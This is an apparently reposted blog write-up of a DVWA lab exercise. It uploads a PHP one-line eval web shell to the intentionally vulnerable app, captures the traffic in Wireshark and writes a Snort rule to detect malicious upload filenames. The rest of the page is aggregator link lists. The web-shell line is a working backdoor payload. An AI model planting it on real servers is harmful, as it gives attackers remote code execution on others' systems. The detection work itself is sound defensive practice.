DVWA file upload attack

Others 2021-01-24 10:21:43 views: null

Environment introduction
Means of attack
Write rules
analysis
Log content

Environment introduction

Physical machine: win10+wireshark
target machine: win7+phpstudy+DVWA

Means of attack

Upload a file called 1.php, for the contents <?php @eval($_POST['777']) ?>of the file
before uploading, do wireshark capture and filter data

Write rules

alert tcp any any -> any any (msg:"DVWA-upload漏洞攻击"; flow:to_server,established; uricontent:"DVWA-master/vulnerabilities/upload"; fast_pattern:only; content:"name=|22|uploaded|22|"; content:"filename="; distance:0; pcre:"/filename[\s=]+?\x22.+?\.(php|phtml|html|php3|php5|jsp|asp|htm|war|phl|htaccess)/iP"; metadata:service http; sid:5; rev:1;)

analysis

Enter in the terminal (powershell)

snort -de -c C:\Snort\etc\snort.conf -l C:\Snort\log -r C:\dvwa抓包\file-upload.pcapng

Log content

Insert picture description here

Guess you like

Origin blog.csdn.net/weixin_44288604/article/details/108625380

DVWA file upload attack

DVWA——File Upload(low)

File Upload Vulnerability Attack

DVWA-5.File upload

Kali penetration testing of DVWA Series 10 - File Upload (file upload)

DVWA V1.9: File Upload (file upload)

DVWA- file upload Study Notes

File upload vulnerability in DVWA1.9

File upload vulnerability attack and prevention method

DVWA-- full grade file upload (File Uplode)

1.4 DVWA pro-test file upload vulnerability

Front-end security (1) file upload vulnerability attack and defense

WEB attack and defense technology pikachu-- file upload vulnerability

DVWA's reflective XSS attack

DVWA-- file contains

File Contains - DVWA Exercises

[DVWA (d)] XXS reflection-type attack

DVWA - File Inclusion (file containing)

File Upload

ElementUI - Upload file upload

File upload vulnerability (File Upload)

DVWA chapter_file contains

Django Web framework [notes] - ModelForm Ajax a full file upload code KindEditor Xss attack singleton other transactional operations

DVWA vulnerability Range - brute force attack (Brute Force)

Web Security Attack and Defense: Build a DVWA Vulnerability Environment

DVWA's XSS cross-site scripting attack (storage type)

DVWA's XSS cross-site scripting attack (reflection type)

File upload excel file

File upload and file download

DVWA problem 1: DVWA System error - config file not found.

Recommended

Ranking

error: (-215:Assertion failed) !_img.empty() in function ‘cv::imwrite‘

Database migration between Navicat servers

Minimum number of rotation of the array: Array

balenaEtcher for mac (make a boot disk software) v1.5.67

Custom processing serialization and deserialization in jackson

Mu-en-mask system development software

Mastering Regular Expressions

Find mileage Java--

Web pages can not directly concern the public micro-channel number how to do? A key to arouse public concern number of micro-channel solutions

[CodeForces - 739B] Alyona and a tree Tree + [difference] + bipartite

Daily

2024-05-12(28)

2024-05-11(32)

2024-05-10(34)

2024-05-09(32)

2024-05-08(18)

2024-05-07(34)

2024-05-06(6)

2024-05-05(0)

2024-05-04(18)

2024-05-03(8)